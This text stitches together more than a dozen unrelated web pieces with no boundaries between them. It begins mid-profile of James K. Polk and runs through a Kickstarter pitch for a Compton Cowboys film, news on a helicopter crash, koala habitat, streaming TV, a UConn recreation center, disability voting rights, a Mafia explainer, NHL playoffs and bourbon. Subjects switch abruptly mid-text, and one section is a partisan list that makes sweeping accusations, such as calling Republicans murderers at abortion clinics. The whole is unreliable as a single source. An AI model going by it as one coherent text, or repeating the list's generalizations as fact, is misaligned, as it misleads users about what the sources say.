Later career: Polk died only months after leaving the presidency, and thus had no post-presidential career. His life after the White House amounted to a mere 103 days, the shortest time anyone has lived as a former president.
Unusual facts: While in his late teens Polk underwent serious and excruciating surgery for bladder stones, and it has long been suspected that the surgery left him sterile or impotent.
Death and funeral: After serving a single term as president, Polk left Washington on a long and roundabout route back home to Tennessee. What was supposed to be a celebratory tour of the South turned tragic as Polk's health began to fail. And it appeared that he had contracted cholera during a stop in New Orleans.
He returned to his estate in Tennessee, to a new house that was still unfinished, and seemed to recover for a time. But he suffered a relapse of illness, and died on June 15, 1849. After a funeral at a Methodist church in Nashville he was buried in a temporary tomb, and then a permanent grave at his estate, Polk Place.
Legacy: Polk has often been cited as a successful 19th century president as he set goals, which were primarily related to the expansion of the nation, and accomplished them. He also was aggressive in foreign affairs and expanded the executive powers of the presidency.
Polk is also considered to have been the strongest and most decisive president in the two decades before Lincoln. Though that judgment is colored by the fact that as the slavery crisis intensified, Polk's successors, especially in the 1850s, were caught trying to manage an increasingly volatile nation.
He's come a long way since Stand By Me and Star Trek: The Next Generation. Wil Wheaton, now 42, wearing a tie and jacket and full beard, hosts The Wil Wheaton Project on Syfy, Tuesday at 10/9c. The 30-minute show is all about science fiction and “genre entertainment,” which means everything geeky (Comic Con, Kevin Smith, Weird Al). And yes, Wheaton does appear in Sharknado 2. Hint, look closely at all airplane passengers.
Wheaton is perfectly cast for the Syfy show – his fast talking persona is enthralling and charming – and for his role (as himself) on the #1 TV show in America, The Big Bang Theory. (‘Wesley Crusher' can understand ‘Sheldon' perfectly in English and Klingon.) Even off-camera, Wheaton nails it providing the voice of ‘Curtis the Lumberjack' for the point-and-click video game Broken Age, with that other child actor-turned-superstar, Elijah Wood.
***We are grateful to the many who have donated and spread the word about this film. Though we have thankfully exceeded the original goal, new donations will help us to tell an even bigger story. Please see our stretch goals below. We still need your help to get the Compton Cowboys' story told. THANK YOU!!!
THE STORY
Fire on the Hill is a feature length documentary that reveals the underground culture of the Compton Cowboys whose origins trace back to the California's Old West. Today, the last remaining Compton Cowboys are struggling to maintain their dying culture that has served as a refuge from gang life in the often hostile streets of South Central LA.
Decades of crime, industrialization, and development have squeezed out most of the cowboys, turning their open landscape into an urban wasteland. But in 2012, it took a turn for the worse when their stable, known as the Hill, mysteriously burned to the ground. Now without a home, only a few dozen Compton Cowboys remain today.
Fire on the Hill tells the personal story of these last cowboys, their culture, and how for them, Compton is the final battle ground between the Old West and the impinging modern world.
THE COWBOYS
SUPPORTING
WHY YOU'LL LOVE THIS FILM
Everyone has a preconceived notion of Compton and South Central LA. I certainly did when I first met the Cowboys. Let me tell you that this film destroys all your expectations of this area, its people, and its heritage. It's an authentic documentary, shot cinematically as a western film, and reveals Compton like you've never seen it before.
This film will also give you:
Access into the world of Professional Rodeo
Bull Riding Champions, then and now
A raw look into Compton's most dangerous gangs
Investigation into the mysterious stable fire
Music from Compton's underground hip-hop scene
Compton's tie to the West
Chris in Pro Competition
THE LOST COWBOYS
Black Cowboys were a fixture on the American Frontier, and a foundational yet overlooked part of Los Angeles' history. This documentary will reveal their untold story and elevate the forgotten black heroes who helped forge the American Frontier.
THE LAST FRONTIER
You probably don't think ‘cowboy' when you hear Compton. But ties to the Old West are deeply rooted in Compton's history. Laws established in the early ranching days still exist today, making it a unique city where horses are allowed in the streets and backyard farms flourish.
Known as one of the only neutral zones in South Central, the Hill was a place where rival gang members could make friendships between one another. Over the past two decades, the Hill turned hundreds of young teens away from their affiliated gangs.
But with the Hill closed down, many of these young Cowboys have returned to the streets and gang-banging.
HOW YOUR FUNDING HELPS
Over the last 2 years, we've used self funding and in-kind services (thank you to all who have helped) to get the ball rolling and shoot over 30+ hours for this documentary. From that footage we found that we had an unbelievable story on our hands and were able to attract many talented crew members to help us achieve this story. We've nailed down the visual style and figured out the missing pieces and now it's time to capture the rest of the film!
With each passing day, the risk of losing the Hill forever grows greater and greater. That is why we've turned to Kickstarter to raise funds quickly and get us into production.
OUR ULTIMATE GOAL
We plan to shoot, edit and release Fire On The Hill in mid-2016. Then we'll use the film to raise awareness and rebuild the stables in Compton. We envision an ocean of opportunities from there. An endowment program for locals to interact with horses. Recreating “The Hill” for other inner-cities around the world. Please help spread the word and get us there.
STRETCH GOALS: We are overwhelmed and so very grateful for our new and old friends! You got us to the goal of $60,000!!!!!!
With this extraordinary gift, we have already scheduled a rodeo shoot in the next couple of weeks and are beginning to plan for our first round of filming with a crew in April. It's very exciting to be able to say that. With a few more days left to go on Kickstarter, we want to share what we will be able to do with additional funds raised beyond our original goal.
Donations are still coming in. If we are able to hit 65,000, that will allow us to film additional rodeos and follow Compton bull rider Chris Byrd's journey even further as he makes his way on the Pro Rodeo circuit toward the championships held later this year. These funds will also help cover Chris's transportation to the events we are filming, which is big help.
If we can get to 75,000, that will allow us to bring an editor on-board right away to start shaping the movie with the director.
Those extra hands can only help us make a better film to share with all of you and to show the rest of the world the story of the Compton Cowboys even sooner. Once we have the film to share their story, and with the generosity and goodwill you all have shown exists, we can help them raise the awareness and means necessary to carry on their traditions, offer a much-needed service to the South L.A. community, and keep the cowboy culture alive and well for generations to come.
Thank you for your unforgettable support!!!
THE FILMMAKERS
Brett Fallentine - Director/Producer
After receiving a film degree from UC Berkeley, I began working in feature narrative films as an apprentice and assistant editor on Star Wars Episode III and Avatar. I then went on to receive an MFA from USC's school of Cinematic Arts where I transitioned into documentary filmmaking and directed films and TV commercials for Google, Pepsi, IBM, and the Bill Gates Foundation (among others). These experiences created my passion to tell authentic, human stories in a cinematically narrative way.
When I met the Compton Cowboys in 2011, I knew I had to tell their story. Their unique personas and how they viewed the landscape around them was so different than the public's perception of that area that I felt compelled to bring it to life. This film will capture Compton through their eyes and with the same visual artistry that enabled classic Western films to reveal the spirit of the Old West. To me, there's is a story of a culture on the brink of extinction and I want this film to capture their spirit in time.
Jimmy Greenway - Producer
Thank you for looking at our project. It's been an honor working with Brett on this and getting to know the Cowboys. I got my start in the world of music videos and was really fortunate to work with over 100 acts including U2, Bruce Springsteen, Babyface, Tom Petty, Bob Dylan, Van Halen, and John Lee Hooker, and directors David Fincher and Michael Bay. That was like going to the best film school and I came out of it ready to go after my dream of making movies.
The first was “Who Killed The Idea?” starring Harvey Keitel. Then came “Art & Copy” directed by Doug Pray, which premiered at the Sundance Film Festival and won the Emmy® Award for Outstanding Cultural Programming in 2011. Next was the Cannes award-winning film “Freedom To Choose” which documented a therapeutic psychology workshop at a women's prison in central California. I am currently Executive Producer at Enso Collaborative and have had a great time collaborating with director Brett Fallentine on multiple projects for Google and the Bill & Melinda Gates Foundation.
Brad Stonesifer - Director of Photography
A busy DP for commercials and music videos, Brad's films have been showcased at Sundance, Tribeca, Toronto, and SXSW. When he isn't on a camera dolly, he's probably on a surfboard.
Kay Madsen - Director of Photography
German-born DP Kay just completed a project with director Nate Parker on the shootings in Ferguson, MO that have transfixed the nation and the world. He has collaborated on many feature and branded-content projects throughout the world and currently resides in Highland Park, CA.
Filming Chris at Poway Rodeo
Your amazing support (whether it's $5 or $500) will go towards:
Research: Archival photos, historical records, investigations into the fire, fact checking, etc.
Subjects: Outside of the cowboys we will use historians, professors, animal experts, police & fire investigators, city officials, and rodeo professionals (among others) to tell our story. Some interviews are free, others are not.
Production: Locations, permits, camera and sound equipment, transportation & lodging, and our wonderfully talented crew of filmmakers.
Any excess funds will go directly into Editorial and Post Production of this film.
TIMELINE
Story highlights Paris prosecutor's office opens a manslaughter investigation into the crash
The dead include French athletes Camille Muffat, Alexis Vastine and Florence Arthaud
The helicopters were on their way to a gorge for the filming of a reality TV show
(CNN) Three French sports stars were among 10 people killed when two helicopters collided in Argentina on Monday evening, authorities said.
The helicopters were reported to be heading to a gorge in northwestern Argentina for the filming of the reality TV show "Dropped" for the French broadcaster TF1.
Eight French passengers and the choppers' two Argentinian pilots died in the midair crash near the town of Villa Castelli in La Rioja province, Argentina's state news agency Telam reported, citing local authorities.
The dead included the famed sailor Florence Arthaud, who in 1990 broke the record for crossing the North Atlantic alone; the swimmer Camille Muffat, who won three medals at the 2012 Olympics in London; and the boxer Alexis Vastine, who won a bronze medal at the 2008 Olympics in Beijing.
Members of the TV production team were among the other French victims, French authorities said.
New South Wales government is failing to protect koalas by allowing further land clearing, logging and habitat destruction, National Parks Association says
Koalas are “under siege” across NSW, with three separate policies poised to be implemented set to destroy their remaining habitats, according to a briefing paper written by the National Parks Association of NSW.
In light of the increasing threats, the paper calls on the NSW EPA to protect koala habitats.
“The NSW government is completely failing to conserve and protect koala habitat,” the report says. “Koalas can lay claim to be the most poorly managed species in eastern Australia at present – which is hugely disappointing in light of their beloved status.”
The report finds the habitats of the declining koala populations are being threatened on public land by plans to renew agreements allowing the logging of native forests; on private lands by weakened clearing laws proposed by the Baird government; and by a failure of local government protections to identify more koala habitats as they are intended.
'We have to stop the bulldozers': swaths of koala habitat lost, say activists Read more
Between 1990 and 2010, Koala populations in NSW were estimated by the federal government to have declined by 30%. And a report released in May by the NSW Environmental Protection Agency found that all koala populations in NSW, with one possible exception, have continued to decline, with at least one population now considered endangered.
That EPA report also found there were more koalas in forests that were more mature. It therefore concluded that logging was bad for koalas, since even if the forests are replaced, it reduced the maturity of the forests.
“So the question for the EPA is what are they going to do to force the government to protect koalas?,” asked Oisin Sweeney an ecologist with the National Parks Association of NSW.
Since 1997 and 2001, state and federal governments signed Regional Forestry Agreements, which allowed logging of native forests for 20 years. Those begin to expire in 2017 but the federal government's current policy is to extend them when they expire.
An analysis from May this year found the agreements had failed in all their aims, and it was accompanied by a letter from 30 environmental groups saying their extension would “would constitute an irrational decision on environmental, economic and social grounds”.
The briefing paper says in light of the new evidence showing that mature forests are important for koala habitats, the EPA needs to step in and regulate the logging of native forests.
“The expiry of the RFAs offers a circuit breaker and we need to take the opportunity to honestly appraise the impacts of logging and ask whether it's worth it,” the paper concludes.
But on private land, the picture is at least as bad, the report finds.
Draft NSW legislation, set to be introduced to parliament this month, will significantly weaken controls around clearing of native vegetation on private land. It will allow farmers to clear native vegetation without approval in many cases, and give others access to “offsets” so that they can clear their land, and make up for it by supporting conservation efforts elsewhere.
According to WWF, just one of the changes in the sweeping reforms could result in 2.2 million hectares of koala habitat being cleared.
The NSW government said the WWF analysis was “alarmist”, arguing local government laws prohibit the clearing of koala habitat. But the National Parks Association said that was the intention of the laws, whereby koala habitat is mapped and classified as “core”, and then used to guide development.
But the report said in the 21 years since that law was introduced, only four plans protecting koala habitats have been approved.
“That means that core koala habitat is not identified or protected in the vast majority of local government areas in NSW and there no protection … is conferred,” the report said.
With the Regional Forest Agreements poised to be renewed, and NSW set to pass relaxed land clearing laws, the National Parks Association said NSW has a decision to make.
“This means that there is a choice that must be made: do we want to protect koalas, or do we want to allow logging and land-clearing to drive them to extinction?”
Think the ability to dance your a** off like a pro has anything to do with size? Think again.
Blogger and radio producer Whitney Thore started dancing when she was just four years old, and was teaching at Greensboro Dance Theatre by age 16. But she stopped dancing in college after she started experiencing inexplicable weight gain.
"Unable to face my reflection, I failed out of dance class my first semester," Thore told The Huffington Post in an email. "By the time I had graduated from college, been diagnosed with Polycystic Ovarian Syndrome, moved to Korea, and gained 200 pounds, I was finally able to dance socially, at a club or party, but never dreamed I would take a class or perform publicly ever again."
But when Jared Pike, one of the hosts of the morning radio show Thore produces suggested that she make a "Fat Girl Dancing" video series, she agreed. In a recent interview, Thore told Daily Venus Diva that the title is part of an intentional choice to reclaim and embrace the word "fat."
Thore also decided to launch the No Body Shame Campaign to discuss her own struggles with body acceptance and inspire other women. "I am fully dedicated to supporting fellow women in ridding ourselves of shame, and showing that I am NOT ashamed of my body," she told HuffPost.
As Thore wrote on her website:
I am learning to practice aggressive self-love. I have lived my life as a 130-pound woman and as a 350-pound woman in North America, in Europe, and in Asia. Cultural norms, societal pressures, and the whims of the fashion industry do not define my worth as woman or a human being. My intelligence, personality, talents, and contributions do not fluctuate with the numbers on a scale. I am unwaveringly me at any size and I'm learning constructive and pro-active ways to help shape my ideals and the ideals of the world I live in. Do it with me?
Thanks for issuing the challenge, Whitney. We're definitely up for it -- and a dance party.
Here's Thore dancing to "This Is Ya Life" by Jessica Sutta:
When Transparent won two Emmys, the talk was quite rightly about what it meant for growing visibility and acceptance of transgender Americans. Yet there was another cultural shift at work, too. Amazon Prime, a streaming video service that only started offering original content in 2013, had just won two of the biggest prizes in TV; more Emmys than every broadcast network save one (it tied with ABC), and one more than cable TV's reigning home of prestige television, AMC. This is the year that streaming television finally came of age – and my, how it's grown.
Just think of everything that's happened this year. Netflix launched quality dramas like Narcos and Bloodline and even released its first original movie, Beasts of No Nation, in cinemas. It created the genre-busting comedy Master of None and turned Unbreakable Kimmy Schmidt, one of NBC's cast-offs, into one of the buzziest shows of the year.
Hulu went from being the warehouse for network reruns to making original series like the critically adored Difficult People and a resuscitation of Fox's The Mindy Project. Amazon had an uneven year with its new crop of shows, like the god-awful Hand of God and better-but-not-brilliant Red Oaks, but, hey, they won two Emmys and Transparent is returning before the year's over. Even Sony's Crackle, which most people don't even know exists, is getting serious about original programming.
The dominance of the steaming services will be underlined on Friday, when both Netflix and Amazon debut new shows. Marvel's Jessica Jones is the second of the comic book company's five series slated to launch on Netflix. Considering that Disney owns both Marvel and ABC, it says something that the company wants to be in business with Silicon Valley and not just Hollywood.
On the same day, Amazon will drop The Man in the High Castle, a big-budget action series about what life would be like if the Nazis had won the second world war. Critics have admired the previews and everyone's (least) favorite purveyor of online goods is mounting a gigantic marketing campaign. Both of these things were completely unimaginable even three years ago.
But we're not just talking about Amazon, Netflix, and Hulu. This year also saw the launch of HBO Now, the streaming service that lets people without a cable subscription watch Game of Thrones whenever and wherever they want (let's just all agree not to mention that it also comes with True Detective season two). Showtime has its own streaming app and is now available as an add-on with Hulu. CBS got in on the game with the poorly named CBS All Access. NBC is finding out whether people will pay $4 a month for comedy with its service SeeSo, which starts a free trial in December. AMC got spooky with Shudder, an all-horror service.
Even these network-based services are starting to get serious about original content. At the beginning of this year, Amazon wooed Woody Allen away from the cinema for the first time, but was trumped at the end of this year when HBO landed the next phase of Jon Stewart's career, where he'll make digital shorts for HBO Now. CBS proved it's not messing around when it announced a new Star Trek series would play only on CBS All Access (seriously, can't we get this a new name?). They're boldly going where no network has gone before.
Well, not really. Late to the game and desperate to keep up, the networks are doing whatever they can to catch up. This summer, NBC pulled a Netflix and made all of the episodes of its Charles Manson murder mystery Aquarius available at the same time on their website while still airing them sequentially on television. It didn't have a huge impact on either format, but NBC ordered another season.
Competition is heating up between the streaming services as well, and not just for Emmys. When Netflix landed a huge deal for the Friends back catalogue, Hulu answered by purchasing all the old Seinfeld episodes. Amazon is so worried about ruining its relationship with CBS that it ordered streaming rights to its summer shows through 2018.
While deals like this might be getting more common, it's still the experimentation with form, content, and ideas that are really making streaming television thrive. While broadcast television doubles down on the same old formats, resulting in the least-watched fall seasons on record, streaming seems vital and innovative. Before long they're not just going to be winning more Emmys than traditional broadcasters, but also a central place in pop culture.
UConn's Board of Trustees has endorsed the direction of a proposal to build a new Student Recreation Center to replace the current undersized, aging facility and better meet the needs of the student population.
UConn's trustees voted Wednesday to approve the project budget for the new facility, with that approval contingent upon approvals by the board's committees on financial affairs and buildings, grounds and environment. Each committee plans to conduct detailed reviews of the project as part of a process that also will include student input at all stages of planning.
The proposal for the new center comes after more than a decade of input from students who expressed concern about inadequate space and amenities at the current site. Club sports teams also have found themselves limited in the times and locations where they could practice, and students often experience long lines to use the fitness equipment.
The new center would put UConn on par with many of its peer institutions and address a shortcoming in student life amenities, which University officials say is particularly important considering the large number of students who choose to live on campus. The opening date has yet to be determined.
The 200,000-square-foot facility would cost approximately $100 million and is proposed to encompass five full-size basketball courts, a 50-meter pool and aquatics center, a 10,000-square-foot fitness center, six courts for racquetball and squash, a jogging track, seven multi-purpose rooms and other space for locker rooms, shower areas, and program offices.
According to preliminary plans, it may be built on the northwest corner of campus in the vicinity of Lot 9 and the King Hill Road — land known colloquially as the Farmer Brown Lot.
Rec center proposed to open in 2016
The bond would be repaid through student fees not to exceed $250 per semester for full-time undergraduate students and not to exceed $200 per semester for graduate students. It would not be charged to students until the building opens its doors in 2016.
The funding method would mean that many current students would never pay the fee, and any student who was enrolled as of spring 2013 would not be charged a fee for a two-year period if they are still UConn students at the time the facility opens. That decision to “grandfather in” the existing students, if adopted, would ensure that the vast majority of future students are aware that the fee is on the horizon at the time they enroll in UConn.
The proposal has been discussed at length with students, including at two town hall-style meetings sponsored in April by the Undergraduate Student Government, and also in the public comments portion of the Board of Trustees' meeting last April.
UConn officials say students' input has been critical to the process and will continue to be requested and valued to help guide planning for the services, programs and other amenities that will best meet their needs.
The building would be open for all students' use. While university varsity athletes could use the facility on an individual basis in the same manner as any students, it would not be used by the intercollegiate teams for practice or competition events.
Students would not be charged to use the facility, but faculty and staff members would have an opportunity to buy memberships.
More information about specifics of the plan, background and rationale for the fee structure, can be found in a question-and-answer format on the Recreation website.
Republican presidential candidate Donald Trump greets supporters before speaking at a campaign rally, Saturday, Dec. 5, 2015, in Davenport, Iowa. (AP Photo/Charlie Neibergall)
They prioritize security, but their bigotry only fuels the terrorists' recruitment efforts.
They promote military spending because they want to keep us all safe, but neglect to enforce gun control right here at home.
They love the right to bear arms, and believe it makes us all safer, while every study shows that owning guns increases the risk that you or your loved ones will be killed.
They claim to be "pro life" yet murder innocent men and women in abortion clinics.
They claim to be champions of families, but tell same-sex couples, who are deeply in love, that they can't be married.
They claim to be Christians, but rather than preaching tolerance and love, they demonize other religious groups.
They claim to care about the economy while continuing to cut taxes on the richest 1% and refusing to raise even the MINIMUM wage.
This undated photo provided by William Herron, shows Rosalind Alexander-Kasparik, left, and her fiance, David Rector, who is seeking to have his voting rights restored five years after a judge ruled that a traumatic brain injury disqualified him from casting a ballot in San Diego. As the November election neared, it looked like Rector would once again be unable to vote. Then the 66-year-old former National Public Radio producer learned about a California law that took effect Jan. 1, that makes it easier for people with developmental disabilities to keep and regain the right to vote, if they can express a desire to vote. On Tuesday, Aug. 23, Rector will seek to have his voting rights restored and advocates representing him and others who have been disqualified will file a complaint with the U.S. Justice Department asking that the state be required to notify them of the new law in time for the Nov. 8 ballot. (William Herron via AP) The Associated Press
By ELLIOT SPAGAT, Associated Press
SAN DIEGO (AP) — A former producer at NPR who lost his ability to walk and speak asked a judge Tuesday to restore his right to vote under a new California law that makes it easier for people with disabilities to keep that right and regain it if lost.
David Rector, 66, handed a letter to a court clerk shortly after an advocacy group filed a complaint with the U.S. Justice Department asking that California be required to notify people who have been disqualified from voting about the law in time for the Nov. 8 election.
"How are these folks supposed to know about the right to get their voting rights back unless somebody tells them?" Thomas Coleman, legal director of the Spectrum Group, said outside the federal building in downtown San Diego. "The state judiciary has been dragging its feet."
For years, California judges had stripped away the voting rights of people with some disabilities, including autism, Down syndrome and cerebral palsy, "almost as a matter of routine," Coleman said.
Mandy Griffith, an assistant U.S. attorney for the Southern District of California, declined to discuss the status of a year-old Justice Department investigation, launched at Coleman's request, into whether California unlawfully deprives disabled people of voting rights.
Rector was pushed in his wheelchair several blocks to San Diego Superior Court to deliver his written request. Wearing a white T-shirt with black letters that said, "I want to vote," he looked at a computer with eye-tracking software that voiced his desire to cast a ballot.
A judge will consider the request, court spokeswoman Karen Dalton said.
All but about a dozen states have some type of law limiting voting rights for individuals based on competence. Advocates say how those laws are enforced varies widely — not just by state but by county and judge.
Supporters of the limits say the restrictions protect against voter fraud.
Under California's new law, which took effect Jan. 1, seniors and other people with disabilities who are assigned conservators to manage their financial and other affairs keep the right to vote unless a court finds "clear and convincing evidence" that they cannot express a desire to exercise it.
"They're not at the head of the pack, but they're definitely on the forefront," said Michelle Bishop, voting rights specialist at the National Disability Rights Network. "This idea that you simply have to express the desire to vote is how we want people to be thinking about voting rights."
Coleman anticipates the law will provide voting protections in conservatorship cases going forward. The challenge, he said, is getting the word out to people who have lost the right — a number he estimates at 32,000 in California based on a review of Los Angeles County records.
California Secretary of State Alex Padilla said in a statement that his office had not seen the complaint and could not comment specifically on it. But Padilla said he supported the bill that became the law.
"We continually explore ways to provide information to California's diverse population and are always open to receiving recommendations to improve our outreach efforts," Padilla said.
The Judicial Council of California, which sets policies for state courts, had no immediate comment Tuesday.
Rector moved to San Diego from Washington, D.C., in July 2008 to join his fiancee, Rosalind Alexander-Kasparik. He registered to vote almost immediately, even before getting a new driver's license.
Eight months later, Rector clutched his chest and fell to his knees while reading a newspaper at breakfast, stricken by a tear in his aorta. After two days in the hospital, he suffered severe brain trauma that left him unable to speak or use his arms and legs.
Today, he uses a wheelchair to move around and can write with limited use of his right thumb. He communicates with electronic devices, using his thumb or eye-tracking software to indicate what he wants. According to the complaint, he can think, feel, comprehend, remember, see, hear and express emotions. During an interview, he cried out when Alexander-Kasparik described his injury and extended his hand to say goodbye.
Alexander-Kasparik says her fiance is still a voracious consumer of TV and radio news and that they collaborate on a comic book series. He laughs when watching scenes from "Star Wars."
Rector voted in 2010, telling his fiancee of his opinions on a flurry of state ballot measures. At a hearing the following year to appoint Alexander-Kasparik his conservator, Rector cried out after a judge checked a box that said he could no longer vote.
"We knew it was coming, but we didn't know there was anything that could be done about it," said Alexander-Kasparik, describing it as a devastating blow.
As this year's election neared, Alexander-Kasparik asked friends on social media for help getting Rector's rights restored. She eventually learned about the law authored by state Sen. Marty Block, a San Diego Democrat.
Voting "is central to his life," Alexander-Kasparik said. "Civic responsibility is central to his life ... There are so many people who died for this right. So many people take it for granted."
___
This story has been corrected to say NPR instead of NRP in lead.
Cecil replies:
White meat is white because of the chicken's chronic lack of exercise, something to think about next time you're about to curl up in front of the TV for another I Dream of Jeannie rerun. Dark meat, which avian myologists (bird muscle scientists) refer to as “red muscle,” is used for sustained activity — chiefly walking, in the case of a chicken. The dark color comes from a chemical compound in the muscle called myoglobin, which plays a key role in oxygen transport. White muscle, in contrast, is suitable only for short, ineffectual bursts of activity such as, for chickens, flying. That's why the chicken's leg meat and thigh meat are dark and its breast meat (which makes up the primary flight muscles) is white. Other birds more capable in the flight department, such as ducks and geese, have red muscle (and dark meat) throughout.
Muscle type is genetically determined, so we can forgive the chicken for thinking, Hey, exercise is futile! My breast is going to stay white no matter how many reps I do on the Nautilus! This is not true for humans, but I understand the feeling. Where's that remote?
Send questions to Cecil via cecil@straightdope.com.
"Dapper Don" John Gotti in his 1990 mug shot
The ultimate point of the Mafia is to make money. Families use a variety of activities to accomplish this. One of the most common is also one of the simplest -- extortion. Extortion is forcing people to give up their money by threatening them in some way. Mafia "protection rackets" are extortion schemes. They tell a shop owner that she needs to pay them $100 a week so they can "protect" her from criminals who might demolish the shop or hurt her family -- the implication being that the Mafia members themselves are these criminals.
The Mafia makes money by participating in virtually any activity that is illegal. Illegal goods are expensive, untaxed and unregulated. Over the years, mobsters have dealt in alcohol during Prohibition, illegal drugs, prostitution and illegal gambling.
Sometimes, burglaries and muggings generate income, but the capos know that their activities need a grander scale to ensure maximum profit. This is why they hijack trucks and unload entire shipments of stolen goods. Another method used by Mafioso is to pay off truck drivers or dockworkers, who will "misplace" crates and shipments that later end up in Mafia hands. The stolen goods could be anything from stereo equipment to women's clothing (a favorite of John Gotti early in his career).
One of the most notorious Mafia schemes was the infiltration of labor unions. For several decades, it is believed that every major construction project in New York City was controlled by the Mafia. Mobsters paid off or threatened union leaders to get a piece of the action whenever a union group got a construction job, and they sometimes made their way into the ranks of leadership themselves. And once the Mafia had its grip firmly on a union, it could control an entire industry. Mafioso could get workers to slow or halt construction if contractors or developers didn't make the right payoffs, and they had access to huge union pension funds. At one point, the Mafia could have brought nearly all construction and shipping in the United States to a halt. But the last 20 years have seen the federal government crack down on Mafia-union connections to a great extent.
The current structure of the Mafia took centuries to develop. To learn about the history of the mafia and to see how law enforcement has dealt with organized crime over the years, read on.
There's going to be one upset -- at least. That's just how the NHL postseason works. It's a league of parity, plus one of these teams battling to get in will just keep on rolling against a team that's been coasting for weeks. Really, once you establish the 16 playoffs teams, you might as well eliminate the seedings next to their names.
Last year, lower-seeded teams in the Ottawa Senators, New York Rangers, Detroit Red Wings, San Jose Sharks and Los Angeles Kings all won their first-round series, with the lower seeds winning more games than the higher seeds overall in that round. Two of those upsets were No. 7 seeds (Ottawa and Detroit) beating the No. 2 teams in their conferences. The No. 3 team in the West (Vancouver) didn't even win a single first-round game.
That's the beauty of the NHL playoffs.
So as the playoff races enter their final games, the race for the final spots should be just as interesting to the fans of the contenders as it is to those teams vying for a spot because history suggests one of them is going to pull off a first-round upset.
Which is the most likely wild-card candidate to pull of a first-round upset? Here they are in order:
1. Detroit Red Wings
With the way the Red Wings are playing right now, you have to wonder if Mike Babcock's approach to the regular season is similar to his approach to an Olympic tournament, because as he did with Team Canada, he has the Red Wings playing their best hockey at the perfect time. In this case, he's doing it without some of his biggest horses. When I posed the question of which bubble team they'd least like to face, scouts didn't hesitate.
“Start with the Wings,” said an Eastern Conference scout. “They definitely can [win the round]. You could argue they're playing their best hockey of the season. They seemed to have gotten a lot of confidence.”
Young players like Gustav Nyquist, Tomas Tatar, Riley Sheahan, Luke Glendening and Tomas Jurco have been instrumental in helping Detroit surge into a playoff spot, and in the process proved they can compete at the highest level. That's invaluable experience as Detroit's regulars get healthy.
“I won't go back to what I was before,” Tatar said when we chatted recently. “I knew I can play at this level. I feel better. I'm not sure how the [production] will go because you won't get the minutes you will now, but the game won't change for me. I know what I can do.”
Many of these Red Wings don't have NHL playoff experience, but they believe their experience in winning a Calder Cup last year in the AHL helps provide framework on what to expect, and they don't expect to go in and roll over if they make the playoffs.
“You go in and anything can happen,” said Glendening, who signed a three-year extension over the weekend then scored his first NHL goal. “You have to go in with a positive attitude. You're ready to take on anyone you face.”
To put themselves in playoff position, the Red Wings have beaten high-end playoffs teams like the Pittsburgh Penguins, Boston Bruins and Tampa Bay Lightning, further bolstering their case as an upset candidate.
There are concerns on defense, with the loss of Jonathan Ericsson an often overlooked injury, but one that is as big as any because of Detroit's lack of depth on defense. That was something Montreal was able to expose on Saturday in the Canadiens' win over Detroit. Both Henrik Zetterberg and Ericsson are possibilities to return in the first round. In the meantime, the youth and talent up front makes Detroit a tough draw for either Boston or Pittsburgh if the Red Wings make it.
“They're really good players. Because they won a championship in the AHL they understand ... the grind, what it takes to win a championship,” said one longtime scout.
It's funny every once and a while to eavesdrop on the K&L phone staff chatting about whiskey with a customer. You still hear a lot of this:
"No, we don't expect any more Weller 12 any time soon."
"No, there's no Elmer T. Lee and we don't think we'll have it available any time soon."
"Pappy? Are you kidding?"
I used to get a lot of that kind of thing in the store and via email, but I think most people are hip to the game at this point. That being said, I don't get a lot of other Bourbon questions as a result. Things I rarely ever hear anymore would be:
"What's a good, everyday Bourbon?"
"What's an interesting new Bourbon out there?"
"What's an under the radar Bourbon I might not ever have tried?"
I have my own personal feelings about the future of whiskey in 2017 and—to put it shortly—I think there's going to be a reckoning for those predicting increased growth in the industry. It's simple: a large percentage of whiskey "drinkers" out there aren't actually drinking whiskey. They're interested in acquiring whiskey, experimenting with whiskey, researching their whiskey, pouring samples into tiny bottles, and sharing their opinions about those experiences. The only thing drawing those people in is the rarity or singularity of the opportunity. Once that's taken away from them, there's nothing left for them to enjoy.
I hate to break it those folks, but 2017 will not be the year the Bourbon industry unleashes dozens of new and exciting releases, each over ten years of age, cask strength in proof, and at prices that everyone can afford. As a result, 2017 will be the year that thousands and thousands of Bourbon "drinkers" all over the country will walk away from the category.
But that's not going to happen because Bourbon in 2017 doesn't taste as good as it used to; on the contrary! Bourbon in 2017 is going to taste as good as it always has. The shelves will still be full with plenty of delicious, well-priced options. That's not the issue. The people who walk away from American whiskey this year will be the same people who only just discovered it; they'll move away from Bourbon because the very thing that originally brought them into the genre is now unavailable. In my opinion, a certain percentage of the growth (I can't say exactly how much because this is all speculatory) the category has experienced over the last decade has been founded on the market's boutique segment and the prestige associated with tracking down those rare releases. Now that there's no more boutique Bourbon out there, do you think the guys who spend all their free time Pappy hunting are going to settle for drinking Four Roses Yellow Label? Or standard Maker's Mark? Do you think the guy who has every Willett private edition bottling from 2006 to 2013 gives a shit about Very Old Barton?
I don't.
At the same time, I don't expect the guy who once paid $120 for Pappy 20 to now pay $550 for a bottle of Michter's 20. Why would you pay more for less? The same thing happened to the Bordeaux market about five years ago. The prices for the top wines had shot up due to Robert Parker's popularity and the market became a feeding frenzy for wealthy collectors. But when the prices kept creeping up and all the hoopla of the 2005, 2009, and 2010 vintages wore off, the château owners got a little dose of reality during the less attractive 2011, 2012, and 2013 harvests. When the trophy wines were gone, the "vintage of a lifetime" moniker absent, and all you had was classic, drinkable, dependable Bordeaux, no one seemed to be interested any more (even though the wines were still perfectly delicious!). The Bordalais discovered there had been little growth in the actual consumption of Bordeaux, but rather that thousands and thousands of collectors and hobbyists had been caught up in the cultural hype and created that incredible growth out of a desire to participate. The château owners thought the increased sales they had experienced indicated a new renaissance for the category, when in reality it pointed to a mere pop culture faddism. Take away the 95+ point reviews and all of a sudden no one feels like drinking anymore. Isn't it funny how that works?
